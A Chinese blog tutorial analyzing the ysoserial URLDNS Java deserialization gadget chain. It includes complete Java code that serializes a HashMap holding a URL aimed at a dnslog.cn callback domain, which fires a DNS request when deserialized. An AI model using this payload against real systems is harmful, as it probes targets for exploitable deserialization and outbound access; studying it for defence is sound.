java反序列化之URLDNS链分析

最新推荐文章于 2024-07-18 19:44:31 发布
最新推荐文章于 2024-07-18 19:44:31 发布
阅读量563 收藏
点赞数
文章标签: intellij-idea maven java
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_45682070/article/details/121487116
版权

readObject()方法

Java反序列化会调用对应的readobject方法
比如我创建一个类test。序列化test类就会调用writeobject方法,
反序列化就会调用test类的readobject方法。默认是存在的。可以重写readobject方法
在HashMap类中,恰恰存在readobject方法

利用链:

ysoserial项目的利用链
 *   Gadget Chain:
 *     HashMap.readObject()
 *       HashMap.putVal()
 *         HashMap.hash()
 *           URL.hashCode()
 其实可以细分一下:
 HashMap.readObject() ->  HashMap.putVal() -> HashMap.hash() 
-> URL.hashCode()->URLStreamHandler.hashCode().getHostAddress
->URLStreamHandler.hashCode().getHostAddress
->URLStreamHandler.hashCode().getHostAddress.InetAddress.getByName

分析:
首先找到HashMap的readObject()方法
在断点处 puVal方法调用hash()方法
在这里插入图片描述
跟进hash方法:
在这里插入图片描述
这里有个三元判断,当传入的参数(这里的key就是HashMap对象的键)不为空的时候,就会调用key下的hashCode()方法
跟进看一下
在这里插入图片描述
当反序列化的时候,调用了hashCode()方法,hashCode是一个Object方法,那么我们可以找一个重写了hashCode方法的类,然后实例化这个对象,放在HashMap的键里,序列化这个HashMap对象,当反序列化时,就会调用这个对象的hashcode

但是前提是这个类的hashCode方法可以实现我们想要的功能。例如java.net.URL类。

那么下面我们来分析一下java.net.URL类的hashCode方法。
可以看到,这里有一个IF判断,而hashCode属性默认是-1。这段代码的意思就是,当第一次调用hashCode方法的时候,hashCode为-1,不会进入if判断。否则就会进入if判断了,直接返回hashCode属性。
在这里插入图片描述
在这里插入图片描述

到了这里我们跟进一下handler.hashCode方法,传了this参进去,这个this其实就是HashMap的键,handler其实是一个UrLStreamHandler类对象
在这里插入图片描述
进入URLStreamHandler类的hashCode()方法
在这里插入图片描述

getProtocol获取协议,getHostAddress,获取域名对应的ip地址
进入getHostAddress()方法里,主要是getByName方法
在这里插入图片描述
重点在getByName方法。这个方法会发送请求解析域名为IP。通过这种方法最终实现了DNSlog
在这里插入图片描述
在这里插入图片描述
该方法会使用远程请求,进行获取主机的ip,那么这时候就会触发一次请求,到了这里我们的dnslog平台,就可以收到响应了。这就是这个URLDNS链的一个触发点
序列化代码

package com.company;
import java.io.FileOutputStream;
import java.io.ObjectOutputStream;
import java.lang.reflect.Field;
import java.util.HashMap;
import java.net.URL;

public class UrlDns {

    public static void main(String[] args) throws Exception {
        HashMap map = new HashMap();
        URL url = new URL("http://g5w6xs.dnslog.cn");
        //获取URL类的hashCode属性
        Field f = Class.forName("java.net.URL").getDeclaredField("hashCode");
        // 修改访问权限,必须使用setAccessible方法设置为True才能修改private属性
        f.setAccessible(true);
        // 设置hashCode值为123,这里可以是任何不为-1的数字。先这样设置是因为HashMap的put方法也会调用hash(key)方法,
        // 如果不这样的话,会在序列化的时候调用put方法然后调用hash(key),然后直接进行了dnslog。
        f.set(url,123);
        System.out.println(url.hashCode());
        //往HashMap中添加Key为URL对象
        map.put(url,"123");
        // 将url的hashCode重新设置为-1。确保在反序列化时能够成功触发
        f.set(url,-1);

        try{
            // 序列化对象
            FileOutputStream fileOutputStream = new FileOutputStream("./urldns.ser");
            ObjectOutputStream outputStream = new ObjectOutputStream(fileOutputStream);
            outputStream.writeObject(map);
            outputStream.close();
            fileOutputStream.close();
        }catch(Exception e){
            e.printStackTrace();
        }
    }
}

反序列化代码

package com.company;
import java.io.FileInputStream;
import java.io.IOException;
import java.io.ObjectInputStream;
public class UrlDnsSer {
    public static void main(String[] args) throws IOException, ClassNotFoundException {
        // 反序列化对象
        FileInputStream fileInputStream = new FileInputStream("./urldns.ser");
        ObjectInputStream ois = new ObjectInputStream(fileInputStream);

        ois.readObject();
    }
}

参考:

https://www.cnblogs.com/nice0e3/p/13772184.html
https://guokeya.github.io/post/ZcF1VXwaH/
https://www.freebuf.com/articles/web/275842.html
https://blog.csdn.net/qq_41918771/article/details/115094758
XiaoLeiZhaoO
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
Java反序列化之ysoserial URLDNS模块分析
javajavajava
11-19 1182
前言 Java反序列化漏洞 利用时,总会使用到ysoserial这款工具,安服仔用了很多,但是工具的原理却依旧不清不楚,当了这么久的脚本仔,是时候当一波(实习)研究仔,学习下这款工具各个Payload的原理了,下面我们先从漏洞探测模块URLDNS这个Payload开始学起,逐步衍生到漏洞利用模块。 为什么URLDNS模块会发送DNSLOG请求? 分析 下载ysoserial项目,打开pom.xml,程序入口在ysoserial.GeneratePayload 打开GeneratePayloa.
JAVA反序列化漏洞-ysoserial-URLDNS链分析
分享IT行业各种技术经验,从入门到入行,关注我学习更多知识。
02-29 862
对于进行反序列化漏洞原理的学习,URLDNS这条链比较好理解,对后续学习打个基础,URLDNS也是经常用于验证Java反序列化漏洞是否存在,验证服务主机是否出网等情况,为了后期进一步有效性的利用。让我们开始学习吧!
URLDNS链分析
enhengzZ的博客
01-26 2034
ysoserial ysoserial 在idea构建好项目,添加依赖真是麻了,在其pom.xml上有几个依赖位置已经改变,需要手动导入jar包。。 项目准备好后,在pom.xml找到入口类 报错了,这是因为没有传入参数,我们分析URLDNS,在编辑配置里添加程序实参 URLDNS “http://r5z2ag.ceye.io” 可见执行成功 至此能获得序列化数据 URLDNS URLDNS是ysoserial序列化中比较简单的一个链,URLDNS的利用效果是只能触发一次dns请求,而不能去执行命
java反序列化基础
qq_63928796的博客
02-22 1701
Java序列化就是指把Java对象转换为字节序列的过程​ Java反序列化就是指把字节序列恢复为Java对象的过程。序列化:对象 -> 字符串反序列化:字符串 -> 对象。
java反序列化
m0_51632271的博客
09-05 1391
java反序列化--我的学习思路
Java反序列化URLDNS
m0_62466350的博客
05-28 760
URLDNS链是java原生态的一条利用链,通常用于存在反序列化漏洞进行验证的,因为是原生态,不存在什么版本限制。不限制jdk版本,使用Java内置类,对第三方依赖没有要求目标无回显,可以通过DNS请求来验证是否存在反序列化漏洞URLDNS利用链,只能发起DNS请求,并不能进行其他利用这条链路还是比较简单的,通常用于存在反序列化漏洞进行验证的,学好了才能更好的为后面打基础。
Java反序列化入门之URLDNS链1
08-03
本文将深入探讨Java反序列化的基本概念、相关方法、以及如何利用ysoserial工具进行漏洞利用,特别关注URLDNS链的原理和构建。 首先,Java反序列化是指将已序列化的对象数据恢复为原来的对象状态。在Java中,序列化...
109-Java反序列化之ysoserial URLDNS模块分析.pdf
09-20
Java 反序列化之 ysoserial URLDNS 模块分析 Java 反序列化漏洞是 Java 语言中的一种常见漏洞,利用 ysoserial 工具可以对其进行攻击。ysoserial 是一个 Java 反序列化漏洞利用工具,提供了多种 payload,可以对...
URLDNS反序列化链学习.doc
07-09
URLDNS反序列化链学习】文档主要涉及的是Java中的一个安全问题,即URLDNS反序列化链。这是一种利用Java对象序列化机制进行攻击的技术,通常与代码注入和远程代码执行(RCE)漏洞相关。在这个特定的案例中,虽然不能...
java 序列化和重写 hashCode 的原因
12-02
java 序列化和重写 hashCode 以及 equals 方法的例子
S02-URLDNS反序列化构造链1
08-03
总的来说,`S02-URLDNS反序列化构造链1`是一个利用Java反序列化漏洞的实例,通过精心构造的序列化对象和`SilentURLStreamHandler`,可以在反序列化过程中触发DNS查询,这对于安全测试和漏洞探测具有重要意义。...
ShiroScan:Shiro RememberMe 1.2.4反序列化入侵图形化检测工具(Shiro-550)
03-18
有三种方式进行检测,第一种是利用URLDNS进行检测,第二种利用命令执行进行检测,第三种使用SimplePrincipalCollection序列化后进行检测(XCheck ,即X光检查)。 功能简介 默认DNSLOG 选择后会调用dnslog.cn的接口...
告别脚本小子系列丨JAVA安全(6)——反序列化利用链(上)
C20220511的博客
06-24 1102
我们通常把反序列化漏洞和反序列化利用链分开来看,有反序列化漏洞不一定有反序列化利用链(经常用shiro反序列化工具的人一定遇到过一种场景就是找到了key,但是找不到gadget,这也就是在这种场景下没有可利用的反序列化利用链)。如果我们向某个漏洞提交平台提交一个反序列化漏洞,但是不给反序列化利用链,那么平台大概率是不会接受这种漏洞的。...
java反序列化 URLDNS链分析
m0_64815693的博客
04-14 693
java反序列化 URLDNS链分析
JAVA反序列化URLDNS链分析
shelter1234567的博客
01-01 855
简简单单介绍下URLDNS链,轻轻松松学习下URLDNS链。
[JAVA反序列化] URLDNS
snowlyzz的博客
11-08 831
[Java反序列化]—URLDNS链 分析
java 序列化
彻底拆分,一切可控!
12-02 3795
1.序列化是干什么的? 简单的来说就是为了保存各个对象在内存中的状态(也就是实例的变量,不是方法),并且可以把保存的对象状态读出来。虽然你可以用你自己的各种各样的方法来保存 object states,但是java给你提供一种应该比你自己好的保存对象状态的机制,那就是序列化。 2.什么情况下需要序列化 1. 当你想把内存中的对象状态保存到一个文件或者是数据中的时候; 2. 当你想用 ...
IntelliJ IDEA 和 Eclipse的区别
最新发布
qq_29751083的博客
07-18 1046
如果你的机器性能足够强大,且追求更智能的开发体验,IntelliJ IDEA 可能是更好的选择。IntelliJ IDEA 和 Eclipse 都拥有庞大的插件生态系统,但 IntelliJ IDEA 的插件市场可能更集中,易于管理和发现新插件。这使得 Eclipse 在低配置的计算机上运行更为流畅。Eclipse 的插件生态系统非常成熟,有大量的插件可供选择,包括一些特定领域的插件,如 Mylyn 用于任务管理。IntelliJ IDEA 有免费的社区版和付费的专业版,专业版提供了更多的高级功能。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值